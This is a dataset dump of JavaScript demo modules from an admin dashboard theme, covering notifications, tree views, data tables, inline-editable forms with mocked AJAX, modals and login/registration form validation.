code
stringlengths
1
2.08M
language
stringclasses
1 value
var UIGeneral = function () { var handlePulsate = function () { if (!jQuery().pulsate) { return; } if (App.isIE8() == true) { return; // pulsate plugin does not support IE8 and below } if (jQuery().pulsate) { jQuery('#pulsate-regular').pulsate({ color: "#bf1c56" }); jQuery('#pulsate-once').click(function () { $('#pulsate-once-target').pulsate({ color: "#399bc3", repeat: false }); }); jQuery('#pulsate-crazy').click(function () { $('#pulsate-crazy-target').pulsate({ color: "#fdbe41", reach: 50, repeat: 10, speed: 100, glow: true }); }); } } var handleGritterNotifications = function () { if (!jQuery.gritter) { return; } $('#gritter-sticky').click(function () { var unique_id = $.gritter.add({ // (string | mandatory) the heading of the notification title: 'This is a sticky notice!', // (string | mandatory) the text inside the notification text: 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus eget tincidunt velit. Cum sociis natoque penatibus et <a href="#">some link sample</a> montes, nascetur ridiculus mus.', // (string | optional) the image to display on the left image: './assets/img/avatar1.jpg', // (bool | optional) if you want it to fade out on its own or just sit there sticky: true, // (int | optional) the time you want it to be alive for before fading out time: '', // (string | optional) the class name you want to apply to that specific message class_name: 'my-sticky-class' }); return false; }); $('#gritter-regular').click(function () { $.gritter.add({ // (string | mandatory) the heading of the notification title: 'This is a regular notice!', // (string | mandatory) the text inside the notification text: 'This will fade out after a certain amount of time. Vivamus eget tincidunt velit. Cum sociis natoque penatibus et <a href="#">some link sample</a> montes, nascetur ridiculus mus.', // (string | optional) the image to display on the left image: './assets/img/avatar1.jpg', // (bool | optional) if you want it to fade out on its own or just sit there sticky: false, // (int | optional) the time you want it to be alive for before fading out time: '' }); return false; }); $('#gritter-max').click(function () { $.gritter.add({ // (string | mandatory) the heading of the notification title: 'This is a notice with a max of 3 on screen at one time!', // (string | mandatory) the text inside the notification text: 'This will fade out after a certain amount of time. Vivamus eget tincidunt velit. Cum sociis natoque penatibus et <a href="#">some link sample</a> montes, nascetur ridiculus mus.', // (string | optional) the image to display on the left image: './assets/img/avatar1.jpg', // (bool | optional) if you want it to fade out on its own or just sit there sticky: false, // (function) before the gritter notice is opened before_open: function () { if ($('.gritter-item-wrapper').length == 3) { // Returning false prevents a new gritter from opening return false; } } }); return false; }); $('#gritter-without-image').click(function () { $.gritter.add({ // (string | mandatory) the heading of the notification title: 'This is a notice without an image!', // (string | mandatory) the text inside the notification text: 'This will fade out after a certain amount of time. Vivamus eget tincidunt velit. Cum sociis natoque penatibus et <a href="#">some link sample</a> montes, nascetur ridiculus mus.' }); return false; }); $('#gritter-light').click(function () { $.gritter.add({ // (string | mandatory) the heading of the notification title: 'This is a light notification', // (string | mandatory) the text inside the notification text: 'Just add a "gritter-light" class_name to your $.gritter.add or globally to $.gritter.options.class_name', class_name: 'gritter-light' }); return false; }); $("#gritter-remove-all").click(function () { $.gritter.removeAll(); return false; }); } var handleDynamicPagination = function() { $('#dynamic_pager_demo1').bootpag({ paginationClass: 'pagination', next: '<i class="fa fa-angle-right"></i>', prev: '<i class="fa fa-angle-left"></i>', total: 6, page: 1, }).on("page", function(event, num){ $("#dynamic_pager_content1").html("Page " + num + " content here"); // or some ajax content loading... }); $('#dynamic_pager_demo2').bootpag({ paginationClass: 'pagination pagination-sm', next: '<i class="fa fa-angle-right"></i>', prev: '<i class="fa fa-angle-left"></i>', total: 24, page: 1, maxVisible: 6 }).on('page', function(event, num){ $("#dynamic_pager_content2").html("Page " + num + " content here"); // or some ajax content loading... }); } return { //main function to initiate the module init: function () { handlePulsate(); handleGritterNotifications(); handleDynamicPagination(); } }; }();
JavaScript
var UITree = function () { var handleSample1 = function () { $('#tree_1').jstree({ "core" : { "themes" : { "responsive": false } }, "types" : { "default" : { "icon" : "fa fa-folder icon-warning icon-lg" }, "file" : { "icon" : "fa fa-file icon-warning icon-lg" } }, "plugins": ["types"] }); } var handleSample2 = function () { $('#tree_2').jstree({ 'plugins': ["wholerow", "checkbox", "types"], 'core': { "themes" : { "responsive": false }, 'data': [{ "text": "Same but with checkboxes", "children": [{ "text": "initially selected", "state": { "selected": true } }, { "text": "custom icon", "icon": "fa fa-warning icon-danger" }, { "text": "initially open", "icon" : "fa fa-folder icon-default", "state": { "opened": true }, "children": ["Another node"] }, { "text": "custom icon", "icon": "fa fa-warning icon-warning" }, { "text": "disabled node", "icon": "fa fa-check icon-success", "state": { "disabled": true } }] }, "And wholerow selection" ] }, "types" : { "default" : { "icon" : "fa fa-folder icon-warning icon-lg" }, "file" : { "icon" : "fa fa-file icon-warning icon-lg" } } }); } var contextualMenuSample = function() { $("#tree_3").jstree({ "core" : { "themes" : { "responsive": false }, // so that create works "check_callback" : true, 'data': [{ "text": "Parent Node", "children": [{ "text": "Initially selected", "state": { "selected": true } }, { "text": "Custom Icon", "icon": "fa fa-warning icon-danger" }, { "text": "Initially open", "icon" : "fa fa-folder icon-success", "state": { "opened": true }, "children": [ {"text": "Another node", "icon" : "fa fa-file icon-warning"} ] }, { "text": "Another Custom Icon", "icon": "fa fa-warning icon-warning" }, { "text": "Disabled Node", "icon": "fa fa-check icon-success", "state": { "disabled": true } }, { "text": "Sub Nodes", "icon": "fa fa-folder icon-danger", "children": [ {"text": "Item 1", "icon" : "fa fa-file icon-warning"}, {"text": "Item 2", "icon" : "fa fa-file icon-success"}, {"text": "Item 3", "icon" : "fa fa-file icon-default"}, {"text": "Item 4", "icon" : "fa fa-file icon-danger"}, {"text": "Item 5", "icon" : "fa fa-file icon-info"} ] }] }, "Another Node" ] }, "types" : { "default" : { "icon" : "fa fa-folder icon-warning icon-lg" }, "file" : { "icon" : "fa fa-file icon-warning icon-lg" } }, "state" : { "key" : "demo2" }, "plugins" : [ "contextmenu", "dnd", "state", "types" ] }); } var ajaxTreeSample = function() { $("#tree_4").jstree({ "core" : { "themes" : { "responsive": false }, // so that create works "check_callback" : true, 'data' : { 'url' : function (node) { return 'demo/jstree_ajax_data.php'; }, 'data' : function (node) { return { 'parent' : node.id }; } } }, "types" : { "default" : { "icon" : "fa fa-folder icon-warning icon-lg" }, "file" : { "icon" : "fa fa-file icon-warning icon-lg" } }, "state" : { "key" : "demo3" }, "plugins" : [ "dnd", "state", "types" ] }); } return { //main function to initiate the module init: function () { handleSample1(); handleSample2(); contextualMenuSample(); ajaxTreeSample(); } }; }();
JavaScript
var TableAdvanced = function () { var initTable1 = function() { /* Formatting function for row details */ function fnFormatDetails ( oTable, nTr ) { var aData = oTable.fnGetData( nTr ); var sOut = '<table>'; sOut += '<tr><td>Platform(s):</td><td>'+aData[2]+'</td></tr>'; sOut += '<tr><td>Engine version:</td><td>'+aData[3]+'</td></tr>'; sOut += '<tr><td>CSS grade:</td><td>'+aData[4]+'</td></tr>'; sOut += '<tr><td>Others:</td><td>Could provide a link here</td></tr>'; sOut += '</table>'; return sOut; } /* * Insert a 'details' column to the table */ var nCloneTh = document.createElement( 'th' ); var nCloneTd = document.createElement( 'td' ); nCloneTd.innerHTML = '<span class="row-details row-details-close"></span>'; $('#sample_1 thead tr').each( function () { this.insertBefore( nCloneTh, this.childNodes[0] ); } ); $('#sample_1 tbody tr').each( function () { this.insertBefore( nCloneTd.cloneNode( true ), this.childNodes[0] ); } ); /* * Initialize DataTables, with no sorting on the 'details' column */ var oTable = $('#sample_1').dataTable( { "aoColumnDefs": [ {"bSortable": false, "aTargets": [ 0 ] } ], "aaSorting": [[1, 'asc']], "aLengthMenu": [ [5, 15, 20, -1], [5, 15, 20, "All"] // change per page values here ], // set the initial value "iDisplayLength": 10, }); jQuery('#sample_1_wrapper .dataTables_filter input').addClass("form-control input-small input-inline"); // modify table search input jQuery('#sample_1_wrapper .dataTables_length select').addClass("form-control input-small"); // modify table per page dropdown jQuery('#sample_1_wrapper .dataTables_length select').select2(); // initialize select2 dropdown /* Add event listener for opening and closing details * Note that the indicator for showing which row is open is not controlled by DataTables, * rather it is done here */ $('#sample_1').on('click', ' tbody td .row-details', function () { var nTr = $(this).parents('tr')[0]; if ( oTable.fnIsOpen(nTr) ) { /* This row is already open - close it */ $(this).addClass("row-details-close").removeClass("row-details-open"); oTable.fnClose( nTr ); } else { /* Open this row */ $(this).addClass("row-details-open").removeClass("row-details-close"); oTable.fnOpen( nTr, fnFormatDetails(oTable, nTr), 'details' ); } }); } var initTable2 = function() { var oTable = $('#sample_2').dataTable( { "aoColumnDefs": [ { "aTargets": [ 0 ] } ], "aaSorting": [[1, 'asc']], "aLengthMenu": [ [5, 15, 20, -1], [5, 15, 20, "All"] // change per page values here ], // set the initial value "iDisplayLength": 10, }); jQuery('#sample_2_wrapper .dataTables_filter input').addClass("form-control input-small input-inline"); // modify table search input jQuery('#sample_2_wrapper .dataTables_length select').addClass("form-control input-small"); // modify table per page dropdown jQuery('#sample_2_wrapper .dataTables_length select').select2(); // initialize select2 dropdown $('#sample_2_column_toggler input[type="checkbox"]').change(function(){ /* Get the DataTables object again - this is not a recreation, just a get of the object */ var iCol = parseInt($(this).attr("data-column")); var bVis = oTable.fnSettings().aoColumns[iCol].bVisible; oTable.fnSetColumnVis(iCol, (bVis ? false : true)); }); } return { //main function to initiate the module init: function () { if (!jQuery().dataTable) { return; } initTable1(); initTable2(); } }; }();
JavaScript
var EcommerceOrdersView = function () { var handleInvoices = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_invoices"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { // here you can define a typical datatable settings from http://datatables.net/usage/options "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, "bServerSide": true, "sAjaxSource": "demo/ecommerce_order_invoices.php", "aaSorting": [[ 1, "asc" ]] // set first column as a default sort by asc } }); // handle filter submit button click grid.getTableWrapper().on('click', '.table-group-action-submit', function (e) { e.preventDefault(); var action = $(".table-group-action-input", grid.getTableWrapper()); if (action.val() != "" && grid.getSelectedRowsCount() > 0) { grid.addAjaxParam("sAction", "group_action"); grid.addAjaxParam("sGroupActionName", action.val()); var records = grid.getSelectedRows(); for (var i in records) { grid.addAjaxParam(records[i]["name"], records[i]["value"]); } grid.getDataTable().fnDraw(); grid.clearAjaxParams(); } else if (action.val() == "") { App.alert({type: 'danger', icon: 'warning', message: 'Please select an action', container: grid.getTableWrapper(), place: 'prepend'}); } else if (grid.getSelectedRowsCount() === 0) { App.alert({type: 'danger', icon: 'warning', message: 'No record selected', container: grid.getTableWrapper(), place: 'prepend'}); } }); } var handleCreditMemos = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_credit_memos"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { "aLengthMenu": [ [10, 20, 50, 100, 150, -1], [10, 20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 10, "bServerSide": true, "sAjaxSource": "demo/ecommerce_order_credit_memos.php", "aoColumnDefs" : [{ // define columns sorting options(by default all columns are sortable extept the first checkbox column) 'bSortable' : true }], "aaSorting": [[ 0, "asc" ]] // set first column as a default sort by asc } }); } var handleShipment = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_shipment"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { "aLengthMenu": [ [10, 20, 50, 100, 150, -1], [10, 20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 10, "bServerSide": true, "sAjaxSource": "demo/ecommerce_order_shipment.php", "aoColumnDefs" : [{ // define columns sorting options(by default all columns are sortable extept the first checkbox column) 'bSortable' : true }], "aaSorting": [[ 0, "asc" ]] // set first column as a default sort by asc } }); } var handleHistory = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_history"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, "bServerSide": true, "sAjaxSource": "demo/ecommerce_order_history.php", "aoColumnDefs" : [{ // define columns sorting options(by default all columns are sortable extept the first checkbox column) 'bSortable' : true }], "aaSorting": [[ 0, "asc" ]] // set first column as a default sort by asc } }); // handle filter submit button click grid.getTableWrapper().on('click', '.table-group-action-submit', function (e) { e.preventDefault(); var action = $(".table-group-action-input", grid.getTableWrapper()); if (action.val() != "" && grid.getSelectedRowsCount() > 0) { grid.addAjaxParam("sAction", "group_action"); grid.addAjaxParam("sGroupActionName", action.val()); var records = grid.getSelectedRows(); for (var i in records) { grid.addAjaxParam(records[i]["name"], records[i]["value"]); } grid.getDataTable().fnDraw(); grid.clearAjaxParams(); } else if (action.val() == "") { App.alert({type: 'danger', icon: 'warning', message: 'Please select an action', container: grid.getTableWrapper(), place: 'prepend'}); } else if (grid.getSelectedRowsCount() === 0) { App.alert({type: 'danger', icon: 'warning', message: 'No record selected', container: grid.getTableWrapper(), place: 'prepend'}); } }); } var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); $(".datetime-picker").datetimepicker({ isRTL: App.isRTL(), autoclose: true, todayBtn: true, pickerPosition: (App.isRTL() ? "bottom-right" : "bottom-left"), minuteStep: 10 }); } return { //main function to initiate the module init: function () { initPickers(); handleInvoices(); handleCreditMemos(); handleShipment(); handleHistory(); } }; }();
JavaScript
var FormEditable = function () { $.mockjaxSettings.responseTime = 500; var log = function (settings, response) { var s = [], str; s.push(settings.type.toUpperCase() + ' url = "' + settings.url + '"'); for (var a in settings.data) { if (settings.data[a] && typeof settings.data[a] === 'object') { str = []; for (var j in settings.data[a]) { str.push(j + ': "' + settings.data[a][j] + '"'); } str = '{ ' + str.join(', ') + ' }'; } else { str = '"' + settings.data[a] + '"'; } s.push(a + ' = ' + str); } s.push('RESPONSE: status = ' + response.status); if (response.responseText) { if ($.isArray(response.responseText)) { s.push('['); $.each(response.responseText, function (i, v) { s.push('{value: ' + v.value + ', text: "' + v.text + '"}'); }); s.push(']'); } else { s.push($.trim(response.responseText)); } } s.push('--------------------------------------\n'); $('#console').val(s.join('\n') + $('#console').val()); } var initAjaxMock = function () { //ajax mocks $.mockjax({ url: '/post', response: function (settings) { log(settings, this); } }); $.mockjax({ url: '/error', status: 400, statusText: 'Bad Request', response: function (settings) { this.responseText = 'Please input correct value'; log(settings, this); } }); $.mockjax({ url: '/status', status: 500, response: function (settings) { this.responseText = 'Internal Server Error'; log(settings, this); } }); $.mockjax({ url: '/groups', response: function (settings) { this.responseText = [{ value: 0, text: 'Guest' }, { value: 1, text: 'Service' }, { value: 2, text: 'Customer' }, { value: 3, text: 'Operator' }, { value: 4, text: 'Support' }, { value: 5, text: 'Admin' } ]; log(settings, this); } }); } var initEditables = function () { //set editable mode based on URL parameter if (App.getURLParameter('mode') == 'inline') { $.fn.editable.defaults.mode = 'inline'; $('#inline').attr("checked", true); jQuery.uniform.update('#inline'); } else { $('#inline').attr("checked", false); jQuery.uniform.update('#inline'); } //global settings $.fn.editable.defaults.inputclass = 'form-control'; $.fn.editable.defaults.url = '/post'; //editables element samples $('#username').editable({ url: '/post', type: 'text', pk: 1, name: 'username', title: 'Enter username' }); $('#firstname').editable({ validate: function (value) { if ($.trim(value) == '') return 'This field is required'; } }); $('#sex').editable({ prepend: "not selected", inputclass: 'form-control', source: [{ value: 1, text: 'Male' }, { value: 2, text: 'Female' } ], display: function (value, sourceData) { var colors = { "": "gray", 1: "green", 2: "blue" }, elem = $.grep(sourceData, function (o) { return o.value == value; }); if (elem.length) { $(this).text(elem[0].text).css("color", colors[value]); } else { $(this).empty(); } } }); $('#status').editable(); $('#group').editable({ showbuttons: false }); $('#vacation').editable({ rtl : App.isRTL() }); $('#dob').editable({ inputclass: 'form-control', }); $('#event').editable({ placement: (App.isRTL() ? 'left' : 'right'), combodate: { firstItem: 'name' } }); $('#meeting_start').editable({ format: 'yyyy-mm-dd hh:ii', viewformat: 'dd/mm/yyyy hh:ii', validate: function (v) { if (v && v.getDate() == 10) return 'Day cant be 10!'; }, datetimepicker: { rtl : App.isRTL(), todayBtn: 'linked', weekStart: 1 } }); $('#comments').editable({ showbuttons: 'bottom' }); $('#note').editable({ showbuttons : (App.isRTL() ? 'left' : 'right') }); $('#pencil').click(function (e) { e.stopPropagation(); e.preventDefault(); $('#note').editable('toggle'); }); $('#state').editable({ source: ["Alabama", "Alaska", "Arizona", "Arkansas", "California", "Colorado", "Connecticut", "Delaware", "Florida", "Georgia", "Hawaii", "Idaho", "Illinois", "Indiana", "Iowa", "Kansas", "Kentucky", "Louisiana", "Maine", "Maryland", "Massachusetts", "Michigan", "Minnesota", "Mississippi", "Missouri", "Montana", "Nebraska", "Nevada", "New Hampshire", "New Jersey", "New Mexico", "New York", "North Dakota", "North Carolina", "Ohio", "Oklahoma", "Oregon", "Pennsylvania", "Rhode Island", "South Carolina", "South Dakota", "Tennessee", "Texas", "Utah", "Vermont", "Virginia", "Washington", "West Virginia", "Wisconsin", "Wyoming"] }); $('#fruits').editable({ pk: 1, limit: 3, source: [{ value: 1, text: 'banana' }, { value: 2, text: 'peach' }, { value: 3, text: 'apple' }, { value: 4, text: 'watermelon' }, { value: 5, text: 'orange' } ] }); $('#fruits').on('shown', function(e, reason) { App.initUniform(); }); $('#tags').editable({ inputclass: 'form-control input-medium', select2: { tags: ['html', 'javascript', 'css', 'ajax'], tokenSeparators: [",", " "] } }); var countries = []; $.each({ "BD": "Bangladesh", "BE": "Belgium", "BF": "Burkina Faso", "BG": "Bulgaria", "BA": "Bosnia and Herzegovina", "BB": "Barbados", "WF": "Wallis and Futuna", "BL": "Saint Bartelemey", "BM": "Bermuda", "BN": "Brunei Darussalam", "BO": "Bolivia", "BH": "Bahrain", "BI": "Burundi", "BJ": "Benin", "BT": "Bhutan", "JM": "Jamaica", "BV": "Bouvet Island", "BW": "Botswana", "WS": "Samoa", "BR": "Brazil", "BS": "Bahamas", "JE": "Jersey", "BY": "Belarus", "O1": "Other Country", "LV": "Latvia", "RW": "Rwanda", "RS": "Serbia", "TL": "Timor-Leste", "RE": "Reunion", "LU": "Luxembourg", "TJ": "Tajikistan", "RO": "Romania", "PG": "Papua New Guinea", "GW": "Guinea-Bissau", "GU": "Guam", "GT": "Guatemala", "GS": "South Georgia and the South Sandwich Islands", "GR": "Greece", "GQ": "Equatorial Guinea", "GP": "Guadeloupe", "JP": "Japan", "GY": "Guyana", "GG": "Guernsey", "GF": "French Guiana", "GE": "Georgia", "GD": "Grenada", "GB": "United Kingdom", "GA": "Gabon", "SV": "El Salvador", "GN": "Guinea", "GM": "Gambia", "GL": "Greenland", "GI": "Gibraltar", "GH": "Ghana", "OM": "Oman", "TN": "Tunisia", "JO": "Jordan", "HR": "Croatia", "HT": "Haiti", "HU": "Hungary", "HK": "Hong Kong", "HN": "Honduras", "HM": "Heard Island and McDonald Islands", "VE": "Venezuela", "PR": "Puerto Rico", "PS": "Palestinian Territory", "PW": "Palau", "PT": "Portugal", "SJ": "Svalbard and Jan Mayen", "PY": "Paraguay", "IQ": "Iraq", "PA": "Panama", "PF": "French Polynesia", "BZ": "Belize", "PE": "Peru", "PK": "Pakistan", "PH": "Philippines", "PN": "Pitcairn", "TM": "Turkmenistan", "PL": "Poland", "PM": "Saint Pierre and Miquelon", "ZM": "Zambia", "EH": "Western Sahara", "RU": "Russian Federation", "EE": "Estonia", "EG": "Egypt", "TK": "Tokelau", "ZA": "South Africa", "EC": "Ecuador", "IT": "Italy", "VN": "Vietnam", "SB": "Solomon Islands", "EU": "Europe", "ET": "Ethiopia", "SO": "Somalia", "ZW": "Zimbabwe", "SA": "Saudi Arabia", "ES": "Spain", "ER": "Eritrea", "ME": "Montenegro", "MD": "Moldova, Republic of", "MG": "Madagascar", "MF": "Saint Martin", "MA": "Morocco", "MC": "Monaco", "UZ": "Uzbekistan", "MM": "Myanmar", "ML": "Mali", "MO": "Macao", "MN": "Mongolia", "MH": "Marshall Islands", "MK": "Macedonia", "MU": "Mauritius", "MT": "Malta", "MW": "Malawi", "MV": "Maldives", "MQ": "Martinique", "MP": "Northern Mariana Islands", "MS": "Montserrat", "MR": "Mauritania", "IM": "Isle of Man", "UG": "Uganda", "TZ": "Tanzania, United Republic of", "MY": "Malaysia", "MX": "Mexico", "IL": "Israel", "FR": "France", "IO": "British Indian Ocean Territory", "FX": "France, Metropolitan", "SH": "Saint Helena", "FI": "Finland", "FJ": "Fiji", "FK": "Falkland Islands (Malvinas)", "FM": "Micronesia, Federated States of", "FO": "Faroe Islands", "NI": "Nicaragua", "NL": "Netherlands", "NO": "Norway", "NA": "Namibia", "VU": "Vanuatu", "NC": "New Caledonia", "NE": "Niger", "NF": "Norfolk Island", "NG": "Nigeria", "NZ": "New Zealand", "NP": "Nepal", "NR": "Nauru", "NU": "Niue", "CK": "Cook Islands", "CI": "Cote d'Ivoire", "CH": "Switzerland", "CO": "Colombia", "CN": "China", "CM": "Cameroon", "CL": "Chile", "CC": "Cocos (Keeling) Islands", "CA": "Canada", "CG": "Congo", "CF": "Central African Republic", "CD": "Congo, The Democratic Republic of the", "CZ": "Czech Republic", "CY": "Cyprus", "CX": "Christmas Island", "CR": "Costa Rica", "CV": "Cape Verde", "CU": "Cuba", "SZ": "Swaziland", "SY": "Syrian Arab Republic", "KG": "Kyrgyzstan", "KE": "Kenya", "SR": "Suriname", "KI": "Kiribati", "KH": "Cambodia", "KN": "Saint Kitts and Nevis", "KM": "Comoros", "ST": "Sao Tome and Principe", "SK": "Slovakia", "KR": "Korea, Republic of", "SI": "Slovenia", "KP": "Korea, Democratic People's Republic of", "KW": "Kuwait", "SN": "Senegal", "SM": "San Marino", "SL": "Sierra Leone", "SC": "Seychelles", "KZ": "Kazakhstan", "KY": "Cayman Islands", "SG": "Singapore", "SE": "Sweden", "SD": "Sudan", "DO": "Dominican Republic", "DM": "Dominica", "DJ": "Djibouti", "DK": "Denmark", "VG": "Virgin Islands, British", "DE": "Germany", "YE": "Yemen", "DZ": "Algeria", "US": "United States", "UY": "Uruguay", "YT": "Mayotte", "UM": "United States Minor Outlying Islands", "LB": "Lebanon", "LC": "Saint Lucia", "LA": "Lao People's Democratic Republic", "TV": "Tuvalu", "TW": "Taiwan", "TT": "Trinidad and Tobago", "TR": "Turkey", "LK": "Sri Lanka", "LI": "Liechtenstein", "A1": "Anonymous Proxy", "TO": "Tonga", "LT": "Lithuania", "A2": "Satellite Provider", "LR": "Liberia", "LS": "Lesotho", "TH": "Thailand", "TF": "French Southern Territories", "TG": "Togo", "TD": "Chad", "TC": "Turks and Caicos Islands", "LY": "Libyan Arab Jamahiriya", "VA": "Holy See (Vatican City State)", "VC": "Saint Vincent and the Grenadines", "AE": "United Arab Emirates", "AD": "Andorra", "AG": "Antigua and Barbuda", "AF": "Afghanistan", "AI": "Anguilla", "VI": "Virgin Islands, U.S.", "IS": "Iceland", "IR": "Iran, Islamic Republic of", "AM": "Armenia", "AL": "Albania", "AO": "Angola", "AN": "Netherlands Antilles", "AQ": "Antarctica", "AP": "Asia/Pacific Region", "AS": "American Samoa", "AR": "Argentina", "AU": "Australia", "AT": "Austria", "AW": "Aruba", "IN": "India", "AX": "Aland Islands", "AZ": "Azerbaijan", "IE": "Ireland", "ID": "Indonesia", "UA": "Ukraine", "QA": "Qatar", "MZ": "Mozambique" }, function (k, v) { countries.push({ id: k, text: v }); }); $('#country').editable({ inputclass: 'form-control input-medium', source: countries }); $('#address').editable({ url: '/post', value: { city: "San Francisco", street: "Valencia", building: "#24" }, validate: function (value) { if (value.city == '') return 'city is required!'; }, display: function (value) { if (!value) { $(this).empty(); return; } var html = '<b>' + $('<div>').text(value.city).html() + '</b>, ' + $('<div>').text(value.street).html() + ' st., bld. ' + $('<div>').text(value.building).html(); $(this).html(html); } }); } return { //main function to initiate the module init: function () { // inii ajax simulation initAjaxMock(); // init editable elements initEditables(); // init editable toggler $('#enable').click(function () { $('#user .editable').editable('toggleDisabled'); }); // init $('#inline').on('change', function (e) { if ($(this).is(':checked')) { window.location.href = 'form_editable.html?mode=inline'; } else { window.location.href = 'form_editable.html'; } }); // handle editable elements on hidden event fired $('#user .editable').on('hidden', function (e, reason) { if (reason === 'save' || reason === 'nochange') { var $next = $(this).closest('tr').next().find('.editable'); if ($('#autoopen').is(':checked')) { setTimeout(function () { $next.editable('show'); }, 300); } else { $next.focus(); } } }); } }; }();
JavaScript
var UIExtendedModals = function () { return { //main function to initiate the module init: function () { // general settings $.fn.modal.defaults.spinner = $.fn.modalmanager.defaults.spinner = '<div class="loading-spinner" style="width: 200px; margin-left: -100px;">' + '<div class="progress progress-striped active">' + '<div class="progress-bar" style="width: 100%;"></div>' + '</div>' + '</div>'; $.fn.modalmanager.defaults.resize = true; //dynamic demo: $('.dynamic .demo').click(function(){ var tmpl = [ // tabindex is required for focus '<div class="modal hide fade" tabindex="-1">', '<div class="modal-header">', '<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>', '<h4 class="modal-title">Modal header</h4>', '</div>', '<div class="modal-body">', '<p>Test</p>', '</div>', '<div class="modal-footer">', '<a href="#" data-dismiss="modal" class="btn btn-default">Close</a>', '<a href="#" class="btn btn-primary">Save changes</a>', '</div>', '</div>' ].join(''); $(tmpl).modal(); }); //ajax demo: var $modal = $('#ajax-modal'); $('#ajax-demo').on('click', function(){ // create the backdrop and wait for next modal to be triggered $('body').modalmanager('loading'); setTimeout(function(){ $modal.load('ui_extended_modals_ajax_sample.html', '', function(){ $modal.modal(); }); }, 1000); }); $modal.on('click', '.update', function(){ $modal.modal('loading'); setTimeout(function(){ $modal .modal('loading') .find('.modal-body') .prepend('<div class="alert alert-info fade in">' + 'Updated!<button type="button" class="close" data-dismiss="alert">&times;</button>' + '</div>'); }, 1000); }); } }; }();
JavaScript
var Login = function () { var handleLogin = function() { $('.login-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input rules: { username: { required: true }, password: { required: true }, remember: { required: false } }, messages: { username: { required: "Username is required." }, password: { required: "Password is required." } }, invalidHandler: function (event, validator) { //display error alert on form submit $('.alert-danger', $('.login-form')).show(); }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, success: function (label) { label.closest('.form-group').removeClass('has-error'); label.remove(); }, errorPlacement: function (error, element) { error.insertAfter(element.closest('.input-icon')); }, submitHandler: function (form) { form.submit(); // form validation success, call ajax form submit } }); $('.login-form input').keypress(function (e) { if (e.which == 13) { if ($('.login-form').validate().form()) { $('.login-form').submit(); //form validation success, call ajax form submit } return false; } }); } var handleForgetPassword = function () { $('.forget-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { email: { required: true, email: true } }, messages: { email: { required: "Email is required." } }, invalidHandler: function (event, validator) { //display error alert on form submit }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, success: function (label) { label.closest('.form-group').removeClass('has-error'); label.remove(); }, errorPlacement: function (error, element) { error.insertAfter(element.closest('.input-icon')); }, submitHandler: function (form) { form.submit(); } }); $('.forget-form input').keypress(function (e) { if (e.which == 13) { if ($('.forget-form').validate().form()) { $('.forget-form').submit(); } return false; } }); jQuery('#forget-password').click(function () { jQuery('.login-form').hide(); jQuery('.forget-form').show(); }); jQuery('#back-btn').click(function () { jQuery('.login-form').show(); jQuery('.forget-form').hide(); }); } var handleRegister = function () { function format(state) { if (!state.id) return state.text; // optgroup return "<img class='flag' src='assets/img/flags/" + state.id.toLowerCase() + ".png'/>&nbsp;&nbsp;" + state.text; } $("#select2_sample4").select2({ placeholder: '<i class="fa fa-map-marker"></i>&nbsp;Select a Country', allowClear: true, formatResult: format, formatSelection: format, escapeMarkup: function (m) { return m; } }); $('#select2_sample4').change(function () { $('.register-form').validate().element($(this)); //revalidate the chosen dropdown value and show error or success message for the input }); $('.register-form').validate({ errorElement: 'span', //default input error message container errorClass: 'help-block', // default input error message class focusInvalid: false, // do not focus the last invalid input ignore: "", rules: { fullname: { required: true }, email: { required: true, email: true }, address: { required: true }, city: { required: true }, country: { required: true }, username: { required: true }, password: { required: true }, rpassword: { equalTo: "#register_password" }, tnc: { required: true } }, messages: { // custom messages for radio buttons and checkboxes tnc: { required: "Please accept TNC first." } }, invalidHandler: function (event, validator) { //display error alert on form submit }, highlight: function (element) { // hightlight error inputs $(element) .closest('.form-group').addClass('has-error'); // set error class to the control group }, success: function (label) { label.closest('.form-group').removeClass('has-error'); label.remove(); }, errorPlacement: function (error, element) { if (element.attr("name") == "tnc") { // insert checkbox errors after the container error.insertAfter($('#register_tnc_error')); } else if (element.closest('.input-icon').size() === 1) { error.insertAfter(element.closest('.input-icon')); } else { error.insertAfter(element); } }, submitHandler: function (form) { form.submit(); } }); $('.register-form input').keypress(function (e) { if (e.which == 13) { if ($('.register-form').validate().form()) { $('.register-form').submit(); } return false; } }); jQuery('#register-btn').click(function () { jQuery('.login-form').hide(); jQuery('.register-form').show(); }); jQuery('#register-back-btn').click(function () { jQuery('.login-form').show(); jQuery('.register-form').hide(); }); } return { //main function to initiate the module init: function () { handleLogin(); handleForgetPassword(); handleRegister(); } }; }();
JavaScript
